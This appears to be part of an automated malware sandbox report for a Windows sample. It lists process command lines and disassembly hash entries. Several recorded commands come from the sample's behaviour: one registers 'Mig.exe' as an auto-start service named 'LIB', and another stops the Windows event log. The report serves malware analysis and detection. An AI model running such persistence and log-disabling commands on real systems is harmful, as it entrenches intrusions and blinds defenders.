                                                                  MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:55
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                  Imagebase:0x7ff6c3980000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:56
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:57
                                                                  Start time:07:50:03
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                  Imagebase:0x7ff6c3980000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:58
                                                                  Start time:07:50:03
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe start "LIB"
                                                                  Imagebase:0x7ff6c3980000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:59
                                                                  Start time:07:50:03
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:60
                                                                  Start time:07:50:03
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7403e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:61
                                                                  Start time:07:50:03
                                                                  Start date:18/12/2024
                                                                  Path:C:\ProgramData\Mig\Mig.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\ProgramData\Mig\Mig.exe
                                                                  Imagebase:0x7ff6ae1e0000
                                                                  File size:7'679'488 bytes
                                                                  MD5 hash:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 63%, ReversingLabs
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:62
                                                                  Start time:07:50:03
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\lsass.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\lsass.exe
                                                                  Imagebase:0x7ff7ac940000
                                                                  File size:59'456 bytes
                                                                  MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:63
                                                                  Start time:07:50:04
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                  Imagebase:0x7ff7403e0000
                                                                  File size:55'320 bytes
                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:64
                                                                  Start time:07:50:05
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\dwm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"dwm.exe"
                                                                  Imagebase:0x7ff68eb30000
                                                                  File size:94'720 bytes
                                                                  MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:65
                                                                  Start time:07:50:09
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                  Imagebase:0x7ff7403e0000
                                                                  File size:55'320 bytes
                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 00007FFD340B49E9 Relevance: .4, Instructions: 359COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 56612c0008e279386ef0aeee3d889b3374aa1565224a2db95cc7264caefc28a9
                                                                    • Instruction ID: 2a24190803608c21a103f94b1030e4797dfdbc9da3ed007bae0a059beea13abf
                                                                    • Opcode Fuzzy Hash: 56612c0008e279386ef0aeee3d889b3374aa1565224a2db95cc7264caefc28a9
                                                                    • Instruction Fuzzy Hash: B3B14762B1DAC60FE74A9B6848B51747BE1EF57204B0941FFD58ACB2E3DC5CA8069341
                                                                    Function 00007FFD340B206B Relevance: .2, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 23c08e65db7cfaebc698764032f277524a3f0fc6c6f17817e69aa41d710a2df2
                                                                    • Instruction ID: 9adafe8aefbfff43c30fc19e902126d6e122b891d8bee84119b9f30a5f733cae
                                                                    • Opcode Fuzzy Hash: 23c08e65db7cfaebc698764032f277524a3f0fc6c6f17817e69aa41d710a2df2
                                                                    • Instruction Fuzzy Hash: 53513631B0C7890FD31E9A7888655627BA5EB97310B1582BED58BC7297DD28E807C7C2
                                                                    Function 00007FFD340B2130 Relevance: .1, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aee37f30a958ecf0d8fcd55c3d055a7aa5dbffc2981ee34959fecedf2b51b73c
                                                                    • Instruction ID: 7cc37bf29f69b294f9a2987b76cf2ee97852fa07a7d3cd38166d58494d09133e
                                                                    • Opcode Fuzzy Hash: aee37f30a958ecf0d8fcd55c3d055a7aa5dbffc2981ee34959fecedf2b51b73c
                                                                    • Instruction Fuzzy Hash: 5B21C73160D7C80FD31E8A788C695667FA9DB83210B1682EFD5C6C7293DD5898079792
                                                                    Function 00007FFD340B2A1F Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: e"M
                                                                    • API String ID: 0-1337403669
                                                                    • Opcode ID: 9d4231e48fcb8944ff6cc00f5940c3719619b4437d643bfa473a1c66fa41e90b
                                                                    • Instruction ID: ee7dd718454a500731286663c1f22efbd12568885b864463d732f353cdd39e5a
                                                                    • Opcode Fuzzy Hash: 9d4231e48fcb8944ff6cc00f5940c3719619b4437d643bfa473a1c66fa41e90b
                                                                    • Instruction Fuzzy Hash: B961CE3160E7C14FD3179B348C665917FB1EF5321071A81EBD0C5CB1A3E96CA94AD762
                                                                    Function 00007FFD340B0488 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: cBM_^
                                                                    • API String ID: 0-1770416534
                                                                    • Opcode ID: 8d1347c8a504a99c08ed017e2966889c8835b9d7090ae772a1f532be11bfc6b2
                                                                    • Instruction ID: c9875db87dc7da6961c94594c08c5c349f2bd1e4b1030db9e618f5cabe5d339c
                                                                    • Opcode Fuzzy Hash: 8d1347c8a504a99c08ed017e2966889c8835b9d7090ae772a1f532be11bfc6b2
                                                                    • Instruction Fuzzy Hash: 96117A32F0C6074BEBA8667994E16BD2149DF92310F544A76D909DB2E2DEACE804A245
                                                                    Function 00007FFD340B65E0 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: cBM_^
                                                                    • API String ID: 0-1770416534
                                                                    • Opcode ID: fbd46e1e0f444484a11bd9826fe15a117b4c477574549b40a5005909d9ea5e42
                                                                    • Instruction ID: c640dcd78ac644c49a6d1686186a0f7b0e47e939736a7b85bacae0b335299f3c
                                                                    • Opcode Fuzzy Hash: fbd46e1e0f444484a11bd9826fe15a117b4c477574549b40a5005909d9ea5e42
                                                                    • Instruction Fuzzy Hash: F3F01C20B1C5424BF7A9B67880753BE21869F85304F504879E10AD62D3DEADA845A29A
                                                                    Function 00007FFD340B6646 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: cBM_^
                                                                    • API String ID: 0-1770416534
                                                                    • Opcode ID: 2f751b144b698f30964cc1fdbefc7b4340c6048158b88b29939d4257a74c748e
                                                                    • Instruction ID: 61211b02c54699d00cfbd526b9d9a618a4e746be38ea818598990e61046b0cbf
                                                                    • Opcode Fuzzy Hash: 2f751b144b698f30964cc1fdbefc7b4340c6048158b88b29939d4257a74c748e
                                                                    • Instruction Fuzzy Hash: EFE0ED20F0D54247F7AD7A3481B13BE20429F82300F504879E10EC73E3DEADE849B24A
                                                                    Function 00007FFD340B67DD Relevance: .9, Instructions: 909COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51500ca332c7ca28ca1d781abd584ec2f4be71ea0568d4c29a0023ddd77f2310
                                                                    • Instruction ID: cba7d720dc4d1135f37b46d0da38b2b3334f8d1290084bb6e25b66545f00aa77
                                                                    • Opcode Fuzzy Hash: 51500ca332c7ca28ca1d781abd584ec2f4be71ea0568d4c29a0023ddd77f2310
                                                                    • Instruction Fuzzy Hash: B8511721B1C9990FEB89A7288479ABC7BE1EF57340F0404BAD54AC71E3DD5CAC05A34A
                                                                    Function 00007FFD340B66A8 Relevance: .7, Instructions: 687COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 83fd75520df1ae74853240ddb341935811232b2c00ef5a4a7b02ba9ba3476750
                                                                    • Instruction ID: e0c2ca4b717f14027cb9b3ac6c85e52651b155fbf1771076b0f016327d9f3368
                                                                    • Opcode Fuzzy Hash: 83fd75520df1ae74853240ddb341935811232b2c00ef5a4a7b02ba9ba3476750
                                                                    • Instruction Fuzzy Hash: ECA12822B0D6854FEB46A77848796BC7BE0FF67350B0804FAD549C71E3DD5CA805A386
                                                                    Function 00007FFD340B2661 Relevance: .2, Instructions: 227COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d49ea0f88cb7e6c09a2f38b18ba0a91730c2668bba46f6052e37d46c232bdb2
                                                                    • Instruction ID: b27d41d4446ff0e070608186ea9cc72b1dc28cfc36ea9e45872a223ebdf510cc
                                                                    • Opcode Fuzzy Hash: 2d49ea0f88cb7e6c09a2f38b18ba0a91730c2668bba46f6052e37d46c232bdb2
                                                                    • Instruction Fuzzy Hash: CA81A07150D7C14FD30B9B3488A69917FF1EF5721071A45EFD0C6CB2A3D528A94AC762
                                                                    Function 00007FFD340B4A4D Relevance: .2, Instructions: 214COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f3850a32c6edaaa9294d0ad35f323a42ec8c1b7e00ce94d393ab81d850ceb748
                                                                    • Instruction ID: 0262358e31de723fcc4f2708a498beb2b5ad3bfc56631c3bb1fb10b4585d6111
                                                                    • Opcode Fuzzy Hash: f3850a32c6edaaa9294d0ad35f323a42ec8c1b7e00ce94d393ab81d850ceb748
                                                                    • Instruction Fuzzy Hash: A8610262B0DBC60FE35A9B7448B51607FA2EF57204B1941FFD186CB1E3EC5CA80A9391
                                                                    Function 00007FFD340B229D Relevance: .2, Instructions: 213COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b89c92c492ef0252ea67a8983155845b7ec8c5f59b9b4c293a664a648de59f7d
                                                                    • Instruction ID: 41d21e600f5fc7d5e38c6ca7f112da516cc6a5c3b549b45254fb25c17ece9413
                                                                    • Opcode Fuzzy Hash: b89c92c492ef0252ea67a8983155845b7ec8c5f59b9b4c293a664a648de59f7d
                                                                    • Instruction Fuzzy Hash: 0E719C7150E7C14FD30B8B348CA65917FB1EF5721071A85EFD0C6CB2A3D928A84AC7A2
                                                                    Function 00007FFD340B4EF8 Relevance: .2, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c6ee352662a630ab2ca6d7f54408c98e6bbfe1166d4005a906e8a8c8e6827e10
                                                                    • Instruction ID: b7a158050d515e4adc926c09dfd7abd5342fcdabc4966a5cc35f117f95c1fbce
                                                                    • Opcode Fuzzy Hash: c6ee352662a630ab2ca6d7f54408c98e6bbfe1166d4005a906e8a8c8e6827e10
                                                                    • Instruction Fuzzy Hash: F461EF61B0DB820FE39A9B6448B50647FA1EF57200B0941FFC18ACB693DD58A80AA751
                                                                    Function 00007FFD340B4CA5 Relevance: .2, Instructions: 208COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: df9e3d0803d249bc40dcdb6375f33c193109a7245772fc2720122c656950f34e
                                                                    • Instruction ID: e075d1dc40f649d99d9b42041d5da175c36ffaa77f685c643ab25757c43b3f21
                                                                    • Opcode Fuzzy Hash: df9e3d0803d249bc40dcdb6375f33c193109a7245772fc2720122c656950f34e
                                                                    • Instruction Fuzzy Hash: 2F51D352B1D7C60FE34A9BB448B60A07FA1DF5720471941FFD586CB1E3EC4DA80A93A2
                                                                    Function 00007FFD340B4AD2 Relevance: .2, Instructions: 208COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9d22357260e0b09709aa20075b2b577c39b45b60eb2a1005e36f552c6ba25405
                                                                    • Instruction ID: 260381128473d494d302c4be2cdc2648c89da1765ce54f26909440f7695b1ed5
                                                                    • Opcode Fuzzy Hash: 9d22357260e0b09709aa20075b2b577c39b45b60eb2a1005e36f552c6ba25405
                                                                    • Instruction Fuzzy Hash: C561E162B0DBC60FE35A9BB448B60617FA1DF57200B1941FFD18ACB1A3DC5DA80AA351
                                                                    Function 00007FFD340B60C4 Relevance: .2, Instructions: 208COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 783f39cfbe13f92778d0549fb20757725755bff04a3e388f94a4438ad68e5c4d
                                                                    • Instruction ID: fb52dd03cffea42658000d9db39fda431fa2003463bbf43943ffa8cf2d15f15b
                                                                    • Opcode Fuzzy Hash: 783f39cfbe13f92778d0549fb20757725755bff04a3e388f94a4438ad68e5c4d
                                                                    • Instruction Fuzzy Hash: B151F221B0D7D00FD71E462D08A5028BBE1DF93615B1986FED9DACB1A3DC0CE8079796
                                                                    Function 00007FFD340B4B65 Relevance: .2, Instructions: 203COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9bb2fffa9874c7701c74b4a1a6c1dce2c9f98eab71d8009a948984f37b755b3f
                                                                    • Instruction ID: 5bf826dece9c8f9204430df62b918a145e7d5bcd5cad197ca982fcb5130fdd13
                                                                    • Opcode Fuzzy Hash: 9bb2fffa9874c7701c74b4a1a6c1dce2c9f98eab71d8009a948984f37b755b3f
                                                                    • Instruction Fuzzy Hash: 5451B452B1D7C60FD74A9BB448B60A07FA1DF6720475941FFD586CB1A3EC4CA80AD361
                                                                    Function 00007FFD340B4E36 Relevance: .2, Instructions: 203COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30daaa067207ff7d82e1d8ba721073c54d86baa9fc5839ff9896d2fd44b15e27
                                                                    • Instruction ID: 4313740d053313ccff5b2db926846e0a06aa5d401f4a4e6a873a79b9b8b68da7
                                                                    • Opcode Fuzzy Hash: 30daaa067207ff7d82e1d8ba721073c54d86baa9fc5839ff9896d2fd44b15e27
                                                                    • Instruction Fuzzy Hash: E661FF61B0DBC20FE39A9BB448B60607FA1EF57200B0941FFD186CB1E3DD5CA80AA351
                                                                    Function 00007FFD340B23A1 Relevance: .2, Instructions: 200COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a483b0eeb1eb49651ece78da66841395397d65e6e9df27206c7318442591bc29
                                                                    • Instruction ID: 1ce547ba4fae69bda1fb7033587422c3eab253a67c5fdf92d50266f2f768665a
                                                                    • Opcode Fuzzy Hash: a483b0eeb1eb49651ece78da66841395397d65e6e9df27206c7318442591bc29
                                                                    • Instruction Fuzzy Hash: CE61CE3150E7C14FD3178B348CA64917FF1EF5321071A85EBD0C1CB2A3D928A94AD762
                                                                    Function 00007FFD340B4BBE Relevance: .2, Instructions: 200COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5f6f89a9a78f8d1644467da2579c685b454fe39b6bc9f524ef793807297c2345
                                                                    • Instruction ID: 59339c58fad9aee14df98f6ebe65e7b8879ae2d0db71f7255ffc69b867502656
                                                                    • Opcode Fuzzy Hash: 5f6f89a9a78f8d1644467da2579c685b454fe39b6bc9f524ef793807297c2345
                                                                    • Instruction Fuzzy Hash: B451D152B0DBC60FE35A9BB408B60607FA1DF5720471941FBD58ACB1E3EC5CA80A9392
                                                                    Function 00007FFD340B28ED Relevance: .2, Instructions: 198COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c710ca116e928161dd7027e04ce3598c5c6fc5b0b3478d9bb00cd90c5d3c0034
                                                                    • Instruction ID: 82d3bc2b9ed06846912ab7ba85f10a7b169489e02cca42c2ffb171a3d99e9e8e
                                                                    • Opcode Fuzzy Hash: c710ca116e928161dd7027e04ce3598c5c6fc5b0b3478d9bb00cd90c5d3c0034
                                                                    • Instruction Fuzzy Hash: 0961BB7250E7C14FD3079B348CA65A17FB1EF1321071A85EBD0C6CB1A3E96CA94AD762
                                                                    Function 00007FFD340B2570 Relevance: .2, Instructions: 198COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 634bf659ccf8fb866c665eb64a5c54e2155f03b8357b2b784d9a84b91e026a65
                                                                    • Instruction ID: a36c655bd036442ee9b5a3883cee67143af470a0b84750c02690ebba89d6ecee
                                                                    • Opcode Fuzzy Hash: 634bf659ccf8fb866c665eb64a5c54e2155f03b8357b2b784d9a84b91e026a65
                                                                    • Instruction Fuzzy Hash: 6E61CD3150E7C14FD30B9B748C665917FF1EF5321071A85EBD0C2CB1A3D628A94AD7A2
                                                                    Function 00007FFD340B4DB1 Relevance: .2, Instructions: 197COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51c9f1b29390385a24bc370484a9c3ab56d58d85709ccc50d6068f8944054758
                                                                    • Instruction ID: ee64578d8c507ac111ebdb72ef67e4aec90d9695cc9a01bc61bcf15550b57b6a
                                                                    • Opcode Fuzzy Hash: 51c9f1b29390385a24bc370484a9c3ab56d58d85709ccc50d6068f8944054758
                                                                    • Instruction Fuzzy Hash: 2D51F361B0DBC60FE39A9BB448B50607FE1EF57200B0941FBD185CB1A3ED5CA8069351
                                                                    Function 00007FFD340B4C48 Relevance: .2, Instructions: 197COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2207437436.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd340b0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3c5208380af9b14e657056e1cd62864493ce86fe5e1daebf49a759ffa2c4ff29
                                                                    • Instruction ID: 25108d9c763144e5c3c9f253199ed72382e3e5d235a365a674486d03434586d9
